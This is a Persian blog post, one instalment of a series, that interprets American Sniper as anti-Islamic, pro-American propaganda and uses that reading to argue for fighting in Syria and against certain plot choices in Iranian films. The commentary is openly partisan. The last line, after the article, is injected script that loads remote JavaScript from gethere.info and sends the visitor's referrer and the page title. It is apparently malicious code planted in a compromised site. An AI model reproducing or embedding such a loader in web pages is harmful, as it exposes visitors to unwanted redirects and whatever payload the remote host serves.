رسانه، علم غالب امروز – قسمت هفتم

« به نام خدا »

There are three types of people in this world. Sheep, wolves and sheepdogs

Image result for American Sniper Poster
زن، در تمام فیلم های هالیوودی نماد سرزمین و عقیده هست. اگر در یک فیلمی نشان داده بشود که یک زن از یک نژاد غیر آمریکایی (مثل سرخ، سیاه، عرب، ایرانی یا هر فرقه ای) عاشق یک مرد آمریکایی بشود، یعنی اینکه نسبت به این کشور آغوش باز کرده برای پذیرش فرهنگ و عقیده آمریکایی. اگر یک مرد آمریکایی، بره سراغ یک زن آمریکایی و ازش دفاع کنه یعنی من باید سرزمین و عقیده خودم رو حفظ کنم. اگر یک زن آمریکایی یا دختر آمریکایی رو بدزدند و یک قهرمان یک سری موانعی رو رد کنه که بخواد به اون برسه یعنی من در هر شرایطی میخوام که سرزمینم رو حفظ کنم!
مثال هایی وجود داره برای اینکه یک زن ایرانی آغوش باز کرده برای آمریکا!
خانم گ.ف از مثال های آن است!
همچنین در فیلم های ایرانی مانند کرخه تا راین دیده شده که زن ایرانی رفته و شوهر آلمانی گرفته که اینها حاکی از بی اطلاعی کارگردانان عزیز کشورمون هست! چرا که من نباید خودم نشون بدم که فرهنگ من آغوش باز کرده برای یک فرهنگ بیگانه!
کارگردانان باید حواسشون به این نماد ها و عناصر رسانه ها باشه! نباید فیلم نامه طوری نوشته بشه که چنین اتفاقاتی بیفته! این نمادها بین المللی هستند!
در ادامه به بررسی فیلم American Sniper به طور دقیق تر می پردازیم…
شروع فیلم با یک نماد!
فیلم با صدای اذان شروع می شود! در واقع اذان یکی از نماد های اصلی و بارز مسلمانان هست! اما این صدای اذان، پس زمینه ی تصاویر جنگ و ویرانی می شود! اصلی وجود داره به نام اصل مجاورت! اگر یک چیز چندش آور رو با یک چیز معمولی قاطی کنیم، بعد دیگه وقتی اون چیز معمولی اتفاق بیفته خودبه خود اون چیز چندش آور تداعی میشه! انگار که انسان شرطی سازی میشه! در اینجا چنین اتفاقی دقیقا میفته! اذان با جنگ و ویرانی که چندش آور هستند ترکیب شده، پس از این به بعد اگه کسی صدای اذان رو بشنوه، خود به خود جنگ و ویرانی برایش تداعی میشه!
S07_01
در ابتدای فیلم، مناطق و محله های فقیرنشین نشون داده میشه که در واقع جاییه که مسلمانان زندگی می کنند. در این محله ها ماهواره ها خیلی زیاد پیدا میشوند!
S07_02
کمی بعد، آقای کایل (اسنایپر و شخصیت اصلی فیلم) روی یک زن چادری مسلمون نشونه میگیره، بعد میگه که به نظر میاد یه چیزی زیر چادرش داره! دستش حالت عادی نداره! چادری که نماد اسلام هست با وسیله تروریستی ترکیب شده اند…
S07_03
سپس میبینه که یک وسیله منفجره به بچه اش میده و اون رو میفرسته جلو! نشون میده که وقتی کایل روی بچه نشونه گرفته، نفس نفس میزنه! یعنی من با وجدان هستم و نمیتونم یه بچه رو بزنم! همچنین نشون میده که مادران حاضرن بچه خودشون رو بفرستن جلو و به کشتن بدند و حس مادری و فداکاری رو زیر پا بگذارند!
موقع شلیک کردن به اونا، فلش بک میزنه به زمان بچگی خودش که باباش داشت بهش آموزش میداد. دیالوگ های پدرش واقعا کار شده هستند. اینکه میگه “هیچوقت اسلحه ات رو رها نکن! یک روزی شکارچی خوبی میشی و استعدادشم داری!”
در ادامه کلیسا، مسیحیت، صلیب، انجیل و … رو نشون میده به منظور تقابل اونا با اسلام هست، که مثلا اهل خانواده هستند ولی مسلمونا تروریست و … اند.
S07_04
در یکی از دیالوگ های پدرش، میگه: « سه نوع آدم توی دنیا هستند: گوسفند، گرگ، سگ گله. یک دسته از آدما هستند که میگن شیطونی وجود نداره و همونا اگه یه روزی به سراغشون بیاد نمیدونند چطوری از خودشون محافظت کنند. اینها از خشونت برای شکار ضعیفا استفاده می کنند. اینها گرگ اند! کسایی هستند که قدرتی دارند که از گوسفندا در مقابل گرگ ها دفاع می کنند! این ها سگ گله اند! تو این خانواده گوسفند تربیت نمی کنیم! و اگه بخواین تبدیل به گرگ بشین، حالتونو جا میارم! » و در واقع به بچش داره میگه که تو باید سگ گله باشی و از خانواده ات دفاع کنی. این بچه هم وقتی بزرگ میشه و حادثه 11 سپتامبر رو میبینه غیرتی میشه و یعنی اینکه کل آمریکا خانواده من هستند و باید دفاع کنم ازشون! پس مثلا میرم به عراق و اونجا باهاشون می جنگم که اونها پیشروی نکنند و مثلا به نیویورک برسند!
S07_06
از بسیاری از نماد های دفاع مقدس ما در این فیلم استفاده شده!
بعد جالب اینجاست که در کشور ما، دقیقا عکس این تفکر وجود داره! تفکری که میگه چرا باید بریم سوریه؟ چرا بقیه میرن؟ قطعا به خاطر پول میرن وگرنه هیچی درش نیست! و از این هجویات! خب اگه ما نریم اونجا بجنگیم، اونها پیشروی میکنند و وارد خاک کشورمون شده و تو کشور خودمون جنگ به پا میشه! آمریکایی ها می فهمند این قضیه رو ولی …
در جاهای ابتدایی فیلم نشون میده که این شخص خیلی آدم خاصی نیست ولی یک دفعه ای سر قضیه 11 سپتامبر متحول میشه و در آخر هم به قهرمان تبدیل میشه!
آمریکا بهترین کشور دنیاست!
جلو تر در فیلم، در یک دیالوگ گفته میشه که آمریکا بهترین کشور دنیاست! با صحنه ها و زیبایی هایی که در فیلم نشون داده میشه، قطعا چنین جمله ای در ذهن بیننده نقش بسته و علاقه اش رو به آمریکا بیشتر میکنه!
S07_05
 .
.
.
سکانس ها و صحنه های این فیلم طوری طراحی شده اند که بیننده پس از مشاهده کامل فیلم، دقیقا آن حس و تفکری که سازنده های آن خواستار آن بودند، در فرد ایجاد می شود…
 .
.
.
در قسمت های بعدی، به ادامه تشریح این فیلم می پردازیم…

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;